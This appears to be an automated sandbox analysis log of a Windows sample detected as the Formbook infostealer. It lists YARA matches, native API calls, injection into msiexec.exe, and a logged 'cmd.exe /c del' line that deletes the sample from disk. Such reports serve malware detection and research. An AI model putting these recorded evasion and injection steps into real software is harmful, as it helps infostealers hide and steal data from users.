          Source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 0_2_00403225 EntryPoint, #17, SetErrorMode, OleInitialize, SHGetFileInfoA, GetCommandLineA, GetModuleHandleA, CharNextA, GetTempPathA, GetWindowsDirectoryA, lstrcatA, DeleteFileA, OleUninitialize, ExitProcess, lstrcatA, lstrcmpiA, CreateDirectoryA, SetCurrentDirectoryA, DeleteFileA, CopyFileA, CloseHandle, GetCurrentProcess, ExitWindowsEx, ExitProcess, 0_2_00403225
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: String function: 00A2B150 appears 72 times
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 046AB150 appears 72 times
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_0041A350 NtCreateFile, 1_2_0041A350
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_0041A400 NtReadFile, 1_2_0041A400
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_0041A480 NtClose, 1_2_0041A480
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_0041A530 NtAllocateVirtualMemory, 1_2_0041A530
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_0041A34A NtCreateFile, 1_2_0041A34A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_0041A3FB NtReadFile, 1_2_0041A3FB
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_0041A47B NtClose, 1_2_0041A47B
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A698F0 NtReadVirtualMemory, LdrInitializeThunk, 1_2_00A698F0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A69860 NtQuerySystemInformation, LdrInitializeThunk, 1_2_00A69860
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A69840 NtDelayExecution, LdrInitializeThunk, 1_2_00A69840
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A699A0 NtCreateSection, LdrInitializeThunk, 1_2_00A699A0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A69910 NtAdjustPrivilegesToken, LdrInitializeThunk, 1_2_00A69910
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A69A20 NtResumeThread, LdrInitializeThunk, 1_2_00A69A20
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A69A00 NtProtectVirtualMemory, LdrInitializeThunk, 1_2_00A69A00
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A69A50 NtCreateFile, LdrInitializeThunk, 1_2_00A69A50
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A695D0 NtClose, LdrInitializeThunk, 1_2_00A695D0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A69540 NtReadFile, LdrInitializeThunk, 1_2_00A69540
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A696E0 NtFreeVirtualMemory, LdrInitializeThunk, 1_2_00A696E0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A69660 NtAllocateVirtualMemory, LdrInitializeThunk, 1_2_00A69660
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A697A0 NtUnmapViewOfSection, LdrInitializeThunk, 1_2_00A697A0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A69780 NtMapViewOfSection, LdrInitializeThunk, 1_2_00A69780
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A69710 NtQueryInformationToken, LdrInitializeThunk, 1_2_00A69710
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A698A0 NtWriteVirtualMemory, 1_2_00A698A0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A69820 NtEnumerateKey, 1_2_00A69820
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A6B040 NtSuspendThread, 1_2_00A6B040
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A699D0 NtCreateProcessEx, 1_2_00A699D0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A69950 NtQueueApcThread, 1_2_00A69950
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A69A80 NtOpenDirectoryObject, 1_2_00A69A80
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A69A10 NtQuerySection, 1_2_00A69A10
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A6A3B0 NtGetContextThread, 1_2_00A6A3B0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A69B00 NtSetValueKey, 1_2_00A69B00
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A695F0 NtQueryInformationFile, 1_2_00A695F0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A69520 NtWaitForSingleObject, 1_2_00A69520
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A6AD30 NtSetContextThread, 1_2_00A6AD30
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A69560 NtWriteFile, 1_2_00A69560
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A696D0 NtCreateKey, 1_2_00A696D0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A69610 NtEnumerateValueKey, 1_2_00A69610
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A69670 NtQueryInformationProcess, 1_2_00A69670
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A69650 NtQueryValueKey, 1_2_00A69650
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A69FE0 NtCreateMutant, 1_2_00A69FE0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe Code function: 1_2_00A69730 NtQueryVirtualMemory, 1_2_00A69730
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_046E9540 NtReadFile, LdrInitializeThunk, 7_2_046E9540
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_046E95D0 NtClose, LdrInitializeThunk, 7_2_046E95D0
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_046E96E0 NtFreeVirtualMemory, LdrInitializeThunk, 7_2_046E96E0
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_046E96D0 NtCreateKey, LdrInitializeThunk, 7_2_046E96D0
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_046E9710 NtQueryInformationToken, LdrInitializeThunk, 7_2_046E9710
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_046E9FE0 NtCreateMutant, LdrInitializeThunk, 7_2_046E9FE0
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_046E9780 NtMapViewOfSection, LdrInitializeThunk, 7_2_046E9780
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9860 NtQuerySystemInformation,LdrInitializeThunk,7_2_046E9860
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9840 NtDelayExecution,LdrInitializeThunk,7_2_046E9840
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_046E9910
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E99A0 NtCreateSection,LdrInitializeThunk,7_2_046E99A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9A50 NtCreateFile,LdrInitializeThunk,7_2_046E9A50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9560 NtWriteFile,7_2_046E9560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9520 NtWaitForSingleObject,7_2_046E9520
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EAD30 NtSetContextThread,7_2_046EAD30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E95F0 NtQueryInformationFile,7_2_046E95F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9660 NtAllocateVirtualMemory,7_2_046E9660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9670 NtQueryInformationProcess,7_2_046E9670
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9650 NtQueryValueKey,7_2_046E9650
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9610 NtEnumerateValueKey,7_2_046E9610
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9760 NtOpenProcess,7_2_046E9760
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EA770 NtOpenThread,7_2_046EA770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9770 NtSetInformationFile,7_2_046E9770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9730 NtQueryVirtualMemory,7_2_046E9730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EA710 NtOpenProcessToken,7_2_046EA710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E97A0 NtUnmapViewOfSection,7_2_046E97A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EB040 NtSuspendThread,7_2_046EB040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9820 NtEnumerateKey,7_2_046E9820
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E98F0 NtReadVirtualMemory,7_2_046E98F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E98A0 NtWriteVirtualMemory,7_2_046E98A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9950 NtQueueApcThread,7_2_046E9950
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E99D0 NtCreateProcessEx,7_2_046E99D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9A20 NtResumeThread,7_2_046E9A20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9A00 NtProtectVirtualMemory,7_2_046E9A00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9A10 NtQuerySection,7_2_046E9A10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9A80 NtOpenDirectoryObject,7_2_046E9A80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9B00 NtSetValueKey,7_2_046E9B00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EA3B0 NtGetContextThread,7_2_046EA3B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA350 NtCreateFile,7_2_006DA350
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA400 NtReadFile,7_2_006DA400
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA480 NtClose,7_2_006DA480
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA34A NtCreateFile,7_2_006DA34A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA3FB NtReadFile,7_2_006DA3FB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA47B NtClose,7_2_006DA47B
          Source: nji3Lg1ot6.exe, 00000000.00000003.290866251.000000000333F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nji3Lg1ot6.exe
          Source: nji3Lg1ot6.exe, 00000000.00000003.291883164.00000000031A6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nji3Lg1ot6.exe
          Source: nji3Lg1ot6.exe, 00000001.00000002.345127293.0000000000B1F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nji3Lg1ot6.exe
          Source: nji3Lg1ot6.exe, 00000001.00000002.345282700.0000000000CAF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nji3Lg1ot6.exe
          Source: nji3Lg1ot6.exe, 00000001.00000002.345433443.0000000000EAF000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs nji3Lg1ot6.exe
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
          Source: nji3Lg1ot6.exeVirustotal: Detection: 37%
          Source: nji3Lg1ot6.exeReversingLabs: Detection: 41%
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeFile read: C:\Users\user\Desktop\nji3Lg1ot6.exe
          Source: nji3Lg1ot6.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\nji3Lg1ot6.exe "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeProcess created: C:\Users\user\Desktop\nji3Lg1ot6.exe "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeFile created: C:\Users\user\AppData\Local\Temp\nsx7FAD.tmp
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/4@4/4
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,0_2_00402012
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeFile read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404275
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5352:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: Binary string: msiexec.pdb source: nji3Lg1ot6.exe, 00000001.00000002.345417642.0000000000EA0000.00000040.00020000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: nji3Lg1ot6.exe, 00000001.00000002.345417642.0000000000EA0000.00000040.00020000.sdmp
